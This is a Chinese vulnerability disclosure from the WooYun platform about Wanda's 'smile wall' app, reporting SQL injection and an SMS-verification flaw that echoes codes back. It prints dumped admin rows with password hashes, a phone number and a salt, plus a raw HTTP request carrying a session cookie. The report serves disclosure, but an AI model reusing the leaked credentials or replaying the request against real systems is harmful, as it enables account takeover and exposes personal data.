漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
									2014-12-31:	细节已通知厂商并且等待厂商处理中
									2014-12-31:	厂商已经确认,细节仅向厂商公开
									2015-01-10:	细节向核心白帽子及相关领域专家公开
									2015-01-20:	细节向普通白帽子公开
									2015-01-30:	细节向实习白帽子公开
									2015-02-14:	细节向公众公开
								
简要描述:
1·据说核心需要打卡
2·万达的兄弟还记得电影票的事吗?
3·今天是2014最后一天,如果万达能送几张电影票,将从回复楼中挑选最终漏洞所得rank倍值赠送2张电影票
4·此漏洞大概20150101发,谢谢管理员!
详细说明:
app名称:万达笑脸墙
1·sql注入
看库的名称,是集团官网的数据库
捞到两个admin
Database: gw_misc_db
Table: admin
[1 entry]
+---------+-------+----------------+------------+----------------------------------+------
-------+-----------+
| adminId | role  | realName       | dateline   | password                         | cellP
hone   | adminName |
+---------+-------+----------------+------------+----------------------------------+------
-------+-----------+
| 1       | admin | \\u963f\\u82b1 | 1344605184 | a7ac188f74ab36d1e52ab003738bb028 | 13810
678720 | admin     |
+---------+-------+----------------+------------+----------------------------------+------
-------+-----------+
Database: gw_misc_db
Table: smile_admin
[1 entry]
+----+----------------------------------+------+-------+---------+------------+
| id | pw                               | pre  | name  | group   | last_time  |
+----+----------------------------------+------+-------+---------+------------+
| 1  | 48de2244c698282ab7caf8c1403d47d4 | JSBv | admin | 1       | 1419822004 |
+----+----------------------------------+------+-------+---------+------------+
未进一步尝试
 
漏洞证明:
2·缺陷:某接口支持明文短信轰炸,并且回显短信验证码,导致任意手机账号注册、登陆
注册时候 
发送手机短信验证码 的请求 ,其中对手机号进行了加密
GET /wandasmile/smile/getmesssage.do?&phonenum=tAsS9ceWlLt7pxzh%252BdZ8K3ioi9okWtpqYVR5b2QCrvw4m7sqoJ5JOUJsP5f7T4xR%252F8wHL823hL7rY6E0v7xwJbuUrDeZRosKOPAfcjmkrv3YPkJNO9V5hZpb8Q3cVLUgYoFoNFjdTNgJJhLO%252F3BFnA9uIuI8eiKNAY5OtQGmv8A%253D HTTP/1.1
Host: app.wanda.cn
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
Cookie: JSESSIONID=6B3E76F52B769C06836548C7F4BD269E
Connection: keep-alive
Accept-Language: zh-cn
User-Agent: FaceWall/1.0 CFNetwork/711.1.16 Darwin/14.0.0
在后面的测试中,发现了在不加密状态下,同样可以发送验证码,并且验证码回显
 
修复方案:
1·输入过滤
2·控制相关接口权限 
版权声明:转载请注明来源 zzR@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-12-31 18:10
厂商回复:
感谢zzR同学的关注与贡献!此漏洞目测存在,马上通知业务整改!
最新状态:
暂无

 
                 
                        

